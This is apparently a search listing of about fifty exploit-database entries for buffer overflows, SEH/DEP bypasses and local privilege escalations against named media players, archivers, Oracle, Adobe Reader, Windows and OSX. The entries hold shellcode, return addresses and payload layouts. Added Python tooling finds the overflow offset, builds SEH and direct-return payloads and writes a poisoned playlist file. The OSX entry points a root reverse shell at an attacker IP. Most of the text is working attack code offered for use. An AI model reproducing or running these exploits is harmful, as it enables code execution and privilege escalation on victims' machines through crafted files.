41207 matches found
ActFax-4.31---Local-System
Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html sc = "\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49"...
CoolPlayer-Portable-2.19.2
Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake patched by pole Originally found by Securityxxxpert print "\n=====================================" print "CoolPlayer Portable Buffer...
Mini-stream-RM-MP3-Converter-3.1.2
Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow w/ ASLR and DEP bypass Date: 26 July 2012 Exploit Author: Gianni Gnesa Vendor Homepage: http://mini-stream.net/ Software Link: http://mini-stream.net/rm-to-mp3-converter/download Version: 3.1.2.1.2010.03.30 from...
MyMp3-Player-Stack-.m3u-DEP
Title: MyMp3-Player '.m3u' Stack BOF Bypass DEP Author: Daniel Romero Perez @danielrome Software Version: MyMp3-Player 3.02.067 Tested on: Windows XP SP3 - ES Mail: [email protected] Blog: unlearningsecurity.blogspot.com import os import struct # Buffer Buff = "\x41" * 1024 # ShellCode ruby...
BlazeVideo-HDTV-Player-6.6
Exploit Title: BlazeVideo HDTV Player 6.6 Professional Direct Retn Date: 11-25-2012 Exploit Author: Nezim @nezimlufni Vendor Homepage: http://www.blazevideo.com/ Version: BlazeVideo HDTV Player 6.6 Professional filename="video.PLF" junk = "http://"+"\x90"*253 junk +="\x33\xBF\x96\x7C" junk +="\x90...
Aviosoft-Digital-TV-Player-1.x
Exploit Title: Aviosoft Digital TV Player Professional 1.x Direct Retn Date: 11-25-2012 Exploit Author: Nezim @nezimlufni Vendor Homepage: http://www.aviosoft.com/ Version: Aviosoft Digital TV Player Professional 1.x filename="video.PLF" junk = "http://"+"\x90"*253 junk +="\x33\xBF\x96\x7C" junk...
FormatFactory-3.0.1-Profile
Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow Version: 3.0.1 Date: 2012-11-19 Author: Julien Ahrens @MrTuxracer Homepage: http://www.inshell.net from struct import pack file="profile.ini" junk1="\xCC" * 260 nseh="\xeb\x06\x90\x90" eip=pack('L',0x024C1923) # CALL DWORD PTR...
Zoner-Photo-Studio-15-Build-3
Exploit Title: Zoner Photo Studio v15 Build 3 Zps.exe Registry Value Parsing Local Buffer Overflow Version: 15 Build 3, Build 2 Date: 2012-11-09 Author: Julien Ahrens from struct import pack file="poc.reg" junk1="\xCC" * 2136 nseh="\xeb\x06\x90\x90" eip=pack('L',0x0C7D8F13) # JMP DWORD PTR SS:[EBP-18] -...
Oracle-Database-Authentication
Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker can exploit this issue to bypass the authentication process and gain unauthorized access to the database. This vulnerability affects Oracle Database 11g Release 1 and 11g Relea...
NCMedia-Sound-Editor-Pro-7.5.1-SEH-DEP
Exploit: NCMedia Sound Editor Pro v7.5.1 (SEH + DEP) Author: b33f - http://www.fuzzysecurity.com/ OS: Windows 7 Pro SP1 (probably universal across 32-bit) POC - Julien Ahrens (XP SP3) Software: http://www.soundeditorpro.com/ import sys, socket, struct file="MRUList201202.dat"...
NCMedia-Sound-Editor-Pro-7.5.1
Exploit Title: NCMedia Sound Editor Pro v7.5.1 MRUList201202.dat File Handling Local Buffer Overflow Version: 7.5.1 Date: 2012-08-07 Author: Julien Ahrens Website: http://www.inshell.net Software Link: http://www.soundeditorpro.com/ from struct import pack file="MRUList201202.dat" # windows/exec...
FuzeZip-1.0.0.131625-SEH
Date: 16.Apr.2013 Vulnerability reported Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://fuzezip.com/ Software Link: http://download.fuzezip.com/FuzeZipSetup.exe Version: 1.0.0.131625 header1 =...
WinArchiver-3.2-SEH
Exploit Title: Winarchiver V 3.2 SEH Overflow Date: April 24, 2013 Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon Organization: RealPentesting Vendor Homepage: http://winarchiver.com Software Link: http://www.winarchiver.com/WinArchiver3.exe zipheader =...
HexChat-2.9.4-Local-Exploit
HexChat 2.9.4 Local Exploit Bug found by Jules Carter @iMulitia Exploit by Matt "hostess" Andreko mandreko at accuvant.com http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B" * 30 shellcode = msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e...
VirtualDJ-ProHome-7.3
Exploit Author: Alexandro Sánchez Bach functionmixer.blogspot.com Vendor Homepage: http://www.virtualdj.com/ Software Link: http://www.filehippo.com/en/downloadvirtualdj/14361/ Version: VirtualDJ Pro/Home 7.3 def encodeData(decoder, data, validValues): assert data.find("\0") == -1, "Shellcode must be...
Photodex-ProShow-Producer-5.0.3297-.pxs
Exploit Title: Photodex ProShow Producer v5.0.3297 .pxs Memory Corruption Vulnerability Version: 5.0.3297 Date: 2013-02-14 Author: Julien Ahrens @MrTuxracer Homepage: http://www.inshell.net Software Link: http://www.photodex.com from struct import pack file="exploit.pxs" head =...
Inmatrix-Ltd.-Zoom-Player-8.5-.jpeg
Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit. Version: Zoom Player v8.5 Date: 09-1-2013 Author: Debasish Mandal. Blog : http://www.debasish.in/ d =...
Mediacoder-(.lst)-SEH
Exploit Title: All Mediacoder Product SEH Buffer Overflow Download All Product: http://www.mediacoderhq.com/editions.html Vulnerable Product:! Mediacoder 0.8.22.5525 Mediacoder Web Video Edition 0.8.22 Mediacoder Handsets Edition 0.8.22 import os import sys from struct import pack from time impor...
Mediacoder-(.m3u)-SEH
Exploit Title: All Mediacoder Product SEH Buffer Overflow Download All Product: http://www.mediacoderhq.com/editions.html Vulnerable Product:! Mediacoder 0.8.22.5525 Mediacoder Web Video Edition 0.8.22 import os import sys from struct import pack from time import sleep if os.name == "nt":...
MediaCoder-PMP-Edition-0.8.17---(.m3u)
Exploit Title: MediaCoder PMP Edition 0.8.17 Buffer Overflow Exploit SEH Download link: http://www.mediacoderhq.com/device/mpx.htm Vulnerable Product: MediaCoder Personal Media Player Edition Date found: 21.06.2013 Date publish: 21.06.2013 from struct import pack junk = "http://" + "\x41" * 765 nse...
aSc-Timetables-2013
The buffer overflow resides in the Add Subject functionality and is triggered when the user submits an overly long string as the school subject name. To trigger it, go to the main menu, select Subjects, click New, then generate a string with the code belo...
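The entry above tells the reader to paste a generated string into the subject-name field, and several other entries on this listing report the resulting numbers ("Offset to SEH", junk of 301, 2140 or 2172 bytes). The string that makes those offsets recoverable is a cyclic pattern: every four-byte window is unique, so the DWORD that lands in EIP or in the SEH record maps back to exactly one position. The following is an added example, written in Python 3 for this page and not the aSc Timetables exploit's own code. It reimplements the Metasploit-style pattern (Aa0Aa1...) and the reverse lookup; the register value 0x41356141 used in the usage is constructed for the demonstration, not taken from any crash on this page.

```python
import string
import struct
from typing import Union

# The pattern repeats after 26 * 26 * 10 three-character groups (20280 bytes),
# so an offset is only unambiguous within one cycle.
PATTERN_CYCLE = 26 * 26 * 10 * 3


def pattern_create(length: int) -> str:
    """Build the 'Aa0Aa1Aa2...' cyclic pattern, truncated to `length` chars."""
    groups = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                groups.append(upper + lower + digit)
                if len(groups) * 3 >= length:
                    return "".join(groups)[:length]
    # More than one cycle requested: repeat it (offsets become ambiguous).
    cycle = "".join(groups)
    return (cycle * (length // PATTERN_CYCLE + 1))[:length]


def pattern_offset(value: Union[int, bytes, str], length: int = PATTERN_CYCLE) -> int:
    """Return the offset of `value` inside the pattern.

    `value` may be the DWORD read out of EIP or an SEH record (int), the raw
    bytes, or the characters themselves. A 32-bit register holds the pattern
    bytes little-endian, so 0x41356141 is the bytes 41 61 35 41 == "Aa5A".
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value).decode("latin-1")
    elif isinstance(value, bytes):
        needle = value.decode("latin-1")
    else:
        needle = value
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError(f"{needle!r} does not occur in the first {length} bytes of the pattern")
    return idx


if __name__ == "__main__":
    # Step 1: paste this into the input field (subject name, playlist entry, ...).
    print(pattern_create(2500))
    # Step 2: once the debugger shows the overwritten value, e.g. EIP=41356141,
    # feed it back to get the length of the junk that precedes the control value.
    print(pattern_offset(0x41356141, 2500))  # 15
```

Pass the same `length` to `pattern_offset` that you used to create the pattern; if the target truncates or transforms the input (upper-casing, dropping NULs) the lookup fails rather than returning a wrong offset, which is the behaviour you want before spending time on a payload layout.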
AudioCoder-0.8.22---(.m3u)-Direct-
Title: AudioCoder 0.8.22 - Direct Retn Buffer OverFlow version: 0.8.22 build 5506 built on May 27 2013, 00:22:49 link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe Platform: Windows XP sp3 Date: June 21st, 2013 header = "http://" junk = "\x41" * 249 junk+=...
Adrenalin-Player-2.2.5.3-(.asx)-
Title: Adrenalin Player .asx - SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 18th, 2013 header=" " junk= "\x90" * 2079 junk+="\xeb\x06\x90\x90" # jmp short junk+="\x13\xf3\x16\x10" # POP POP RETN AdrenalinX.dll junk+="\x90" * 16 # NOP padding before...
Adrenalin-Player-2.2.5.3-(.wax)-SEH
Title: Adrenalin Player SEH Buffer Overflow software: Adrenalin Player version : 2.2.5.3 Platform: Windows XP sp3 Date: June 16th, 2013 Author: onying @onyiing junk= "\x90" * 2140 junk+="\xeb\x06\x90\x90" # jmp short junk+="\x13\xf3\x16\x10" # POP POP RETN junk+="\x90" * 16 # NOP padding before shellcode...
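The two Adrenalin Player entries above spell out the classic SEH-overwrite layout (junk, a short jump in the nSEH slot, a POP POP RET address in the SEH slot, a NOP pad, then shellcode), and the BlazeVideo, Aviosoft and AudioCoder entries use the simpler direct-RET layout (junk, return address, NOPs, shellcode). The following is an added example, written in Python 3 for this page and not any of those exploits' own code. It builds both layouts from their parameters, refuses bytes that a text-based playlist parser would mangle, and reads the control fields back out so the layout can be checked before the file is ever opened in the target. Assumptions: the bad-character set `\x00\x0a\x0d` is a typical default, not something stated on this page; the four INT3 bytes stand in for real shellcode; the offset 2140 and POP POP RET address 0x1016F313 in the usage are the values printed in the .wax entry above.

```python
import struct

# Bytes that commonly break text-based playlist parsing (NUL, LF, CR).
# Assumed default for this example; adjust per target.
DEFAULT_BADCHARS = b"\x00\x0a\x0d"

# Stand-in for real shellcode: four INT3 breakpoints (constructed for this example).
# Replace with msfvenom output encoded to avoid DEFAULT_BADCHARS.
BREAKPOINT_SHELLCODE = b"\xcc\xcc\xcc\xcc"


def check_badchars(blob: bytes, badchars: bytes = DEFAULT_BADCHARS) -> None:
    """Raise if any byte of `blob` is in the bad-character set."""
    found = sorted({b for b in blob if b in badchars})
    if found:
        raise ValueError("bad characters present: " + ", ".join(f"0x{b:02x}" for b in found))


def build_seh_overflow(offset: int, ppr_addr: int, shellcode: bytes,
                       nops: int = 16, filler: bytes = b"\x90",
                       badchars: bytes = DEFAULT_BADCHARS) -> bytes:
    """filler*offset | nSEH: jmp short +6 | SEH: POP POP RET | NOP sled | shellcode.

    When the overflow faults, the dispatcher calls the SEH pointer; POP POP RET
    returns into the nSEH field, and `eb 06` jumps over its own two pad bytes
    plus the 4-byte SEH pointer, landing on the sled in front of the shellcode.
    """
    nseh = b"\xeb\x06\x90\x90"
    seh = struct.pack("<I", ppr_addr)          # little-endian, as seen in the entries
    check_badchars(seh + shellcode, badchars)
    return filler * offset + nseh + seh + b"\x90" * nops + shellcode


def build_direct_ret_overflow(offset: int, ret_addr: int, shellcode: bytes,
                              nops: int = 16, filler: bytes = b"\x41",
                              badchars: bytes = DEFAULT_BADCHARS) -> bytes:
    """filler*offset | saved EIP (e.g. a JMP ESP) | NOP sled | shellcode."""
    ret = struct.pack("<I", ret_addr)
    check_badchars(ret + shellcode, badchars)
    return filler * offset + ret + b"\x90" * nops + shellcode


def seh_fields(payload: bytes, offset: int) -> dict:
    """Read the nSEH/SEH fields back out of a built payload (layout sanity check)."""
    return {
        "nseh": payload[offset:offset + 4],
        "seh": struct.unpack("<I", payload[offset + 4:offset + 8])[0],
    }


def write_playlist(path: str, payload: bytes, header: bytes = b"http://") -> int:
    """Write the poisoned playlist entry; returns the number of bytes written."""
    data = header + payload
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    # 2140 and 0x1016F313 (POP POP RET in AdrenalinX.dll) are the values shown
    # in the Adrenalin Player .wax entry on this listing.
    p = build_seh_overflow(2140, 0x1016F313, BREAKPOINT_SHELLCODE)
    print(seh_fields(p, 2140))
    print(write_playlist("adrenalin.wax", p))
```

Keep the filler and the NOP pad as parameters: the .asx and .wax entries differ only in the junk length (2079 vs 2140), and the same address works for both because the POP POP RET gadget lives in a module that loads at the same base in each case. A build that raises on a bad character is a cheap check that saves a round of "why does the crash look different" in the debugger.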
Winamp-5.1x-(.m3u)
Stack-based buffer overflow in Nullsoft Winamp 5.12 and 5.13 allows user-assisted attackers to cause a denial of service crash and possibly execute arbitrary code via a crafted .m3u file that causes an incorrect strncpy function call when the player pauses or stops the file. import struct header ...
BOINC-Manager-7.0.64
BOINC is a program that lets you donate your idle computer time to science projects like SETI@home, Climateprediction.net, Rosetta@home, World Community Grid, and many others. In order to exploit the vulnerability the attacker must convince the victim to use the very long URL as Account Manager...
Ophcrack-3.5.0---Local-Code
Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe Version: 3.5.0 shellcode = windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c...
Kloxo-6.1.6---Local-Privilege
Date: August 2012 or so Exploit Author: HTP Vendor Homepage: http://lxcenter.org/ Software Link: download link if available Version: 6.1.6 Latest LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3` export MUID=$LXLABS export GID=$LXLABS export TARGET=/bin/sh export CHECKGID=0 export NONRESIDENT=1...
No-IP-Dynamic-Update-Client-
This exploit covers a stack-based overflow in the -i parameter (the IPaddress variable in the source code). It is probably the most basic parameter, since it is how the client is told that our IP has changed. import os binary = "./noip-2.1.9-1/binaries/noip2-i686" shellcode =...
Adrenalin-Player-2.2-(.m3u)
Exploit Title: Adrenalin Player 2.2.5.3 Buffer Overflow Exploit SEH http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Author: seaofglass [email protected] Version : 2.2.5.3 my $file = "adrenalin.m3u"; my $junk = "\x90" x 2172; my $nseh = pack('V', 0x909006EB); my $seh = pack('V',...
ABBS-Audio-Media-Player-3.1-(.lst)
Exploit Title: ABBS Audio Media Player v3.1 .lst Buffer Overflow Version: v3.1 Date: 2013-05-04 from struct import pack file="exploit.lst" # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode =...
WinAmp-5.63-(winamp.ini)
I tried an alpha3 encoded egghunter but could not fit it in a single buffer and unfortunately it did not work; it wrote an invalid address on the stack then tried to access it. If you can make it work or find a solution for ASLR/DEP please contact me. So I wrote from scratch a venetian shellcode th...
Easy-LAN-Folder-Share-3.2.0-SEH
The registration code field in the 'activate license' window is vulnerable to a buffer overflow. This script generates a malicious registry file. Once the generated file has been loaded into the registry, execute the application as normal. header = "Windows Registry Editor Version 5.00\n\n" heade...
Novell-Client-2-SP3---Privilege-Escalation
The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov. I am not sure whether there was anything else public. Exploit for DEMO purposes: Does not bypass SMEP on Windows 8 from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 =...
Symantec-Workspace-Virtualization-6.4.1895.0
Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit Date: 2013-7-17 Author : MJ0011 Version: Symantec Workspace Virtualization 6.4.1895.0 #include "stdafx.h" #include "windows.h" typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;...
BlazeDVD-Pro-player-6.1-Stack-Based-Buffer
BlazeDVD Pro player 6.1 Local stack based buffer overflow Author: PuN1sh3r Email: [email protected] Date: Mon Jul 15 03:01:37 EDT 2013 Vendor link: http://www.blazevideo.com/download.htmm Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro App Version: 6.1 $file =...
Adobe-Reader-X-10.1.4.38
Product: Adobe Reader X Version: 10.x Product Homepage: adobe.com Binary affected: AcroForm.api Binary Version: 10.1.4.38 from hashlib import md5 import sys, struct # Begin of the miniPDF import zlib # For constructing a minimal pdf file # PDF Reference 3rd edition:: 3.2 Objects class PDFObject: def...
Static-HTTP-Server-1.0-SEH
Notes: Multiple HTTP commands and headers are vulnerable to overflows and trigger an exception, but I was unable to control the SEH handler with anything but configuration options in the http.ini. import os def fileCreate(): print "\n Your current file directory is %s. " % os.getcwd() try: File =...
Adrenalin-Player-2.2.5.3-.wvx-SEH
Exploit Title:Adrenalin Player 2.2.5.3 .wvx SEH-Buffer Overflow Date:7/1/2013 Exploit Author:MrXors Vendor HomePage:http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Software Link:http://software.naver.com/software/summary.nhn?softwareId=MFS100099 Version App:2.2.5.3...
AudioCoder-0.8.22-(.lst)-RTN
Title: AudioCoder 0.8.22 .lst - Direct Retn Buffer OverFlow version: 0.8.22 build 5506 built on May 27 2013, 00:22:49 link: http://www.downloadbestsoft-mirror2.com/programs/AudioCoder-0.8.22.5506.exe Platform: Windows XP sp3 Date: June 23th, 2013 Author: onying @onyiing header = "http://" junk =...
OSX-10.8.4-Local-Root-
Exploit Title: OSX 10.8.4 Local Root Priv Escalation Root Reverse Shell Date: 08-27-2013 Exploit Author: David Kennedy TrustedSec Website: https://www.trustedsec.com Tested On: OSX 10.8.4 import subprocess # IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1"...
Beetel-Connection-Manager
Exploit Title: Beetel Connection Manager SEH Buffer Overflow (software for USB wireless) Homepage: http://www.beetel.in/business-solutions/international-business/3g-products/g31-3g-data-card Version: PCWBTLINDV1.0.0B04 Software...
Internet-Haut-Debit-Mobile
Exploit Title: Internet Haut Debit Mobile Buffer Overflow SEH Software Link: https://app.box.com/s/4h9cm20hp5iiask8rwrm Poc video demo: http://www.youtube.com/watch?v=sAHfjmNHiow Version: PCWMATMARV1.0.0B03 Date found: 10.10.2013 Date published: 10.10.2013 from struct import pack file="NetConfig.ini"...
CCProxy-7.3-Integer-Overflow
Exploit Title: CCProxy v7.3 Integer Overflow Exploit Date: 2013/03/22 Author: Mr.XHat E-Mail: Mr.XHat GMail.com Vendor Homepage: http://www.youngzsoft.net/ Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe Version: Prior To 7.3 hdr = "System" hdr += "\x0d\x0a" hdr +=...
PotPlayer-1.5.42509-Beta
Exploit Title: PotPlayer 1.5.42509 Beta - DoS (Integer Division by Zero) Author: sajith version: PotPlayer 1.5.42509 Beta Vendor Homepage: http://daumpotplayer.com/ Tested in: Windows XP SP3 raw_input("Hit Enter to create a malicious file") f = open("victim.wav","w")...
VUPlayer-2.49-(.M3U)-DEP-Bypass
VUPlayer 2.49 .M3U Exploit (Universal buffer overflow/DEP bypass) Download: http://vuplayer.com/ Tested on Wind0ws XP SP3 DEP:OptOut import struct p = open("ExploitVirtualProtect.m3u", "w") crash = "\x41" * 1012 sc = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"...
Windows-NDPROXY-SYSTEM
Original crash ... null pointer dereference Access violation - code c0000005 (!!! second chance !!!) 00000038 ?? ??? NDPROXY Local SYSTEM privilege escalation from ctypes import * from ctypes.wintypes import * import os, sys kernel32 = windll.kernel32 ntdll = windll.ntdll GENERIC_READ = 0x80000000...
Kingsoft-Office-Writer-8.1.0.3385
Author: Julien Ahrens @MrTuxracer Homepage: http://www.rcesecurity.com Software Link: http://www.kingsoftstore.com Tested on: WinXP-GER, Win7-GER, Win8-EN from struct import pack file="exploit.wps" head="\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00"+...
Calavera-UpLoader-3.5-SEH
exploit by Daniel - La Calavera Email: [email protected] For CracksLatinoS rell = "\x41" * 477 rell1 = "\x42" * 4000 head = "\x41" * 8 head += "\x0d\x0a\x31\x0d\x0a" head1 = "\x0d\x0a" head2 = "170.1.1.0" head2 +="\x0d\x0a" head2 +="\x22" head2 +=...
ALLPlayer-5.8.1-(.m3u)-
Exploit Title: ALLPlayer 5.8.1 - .m3u Buffer Overflow SEH Date: Mar 1 2014 Exploit Author: Gabor Seljan Software Link: http://www.allplayer.org/download/allplayer Version: 5.8.1 use strict; use warnings; my $filename = "sploit.m3u"; my $junk1 = "\x41" x 301; # Offset to SEH my $nSEH = "\x61\x50";...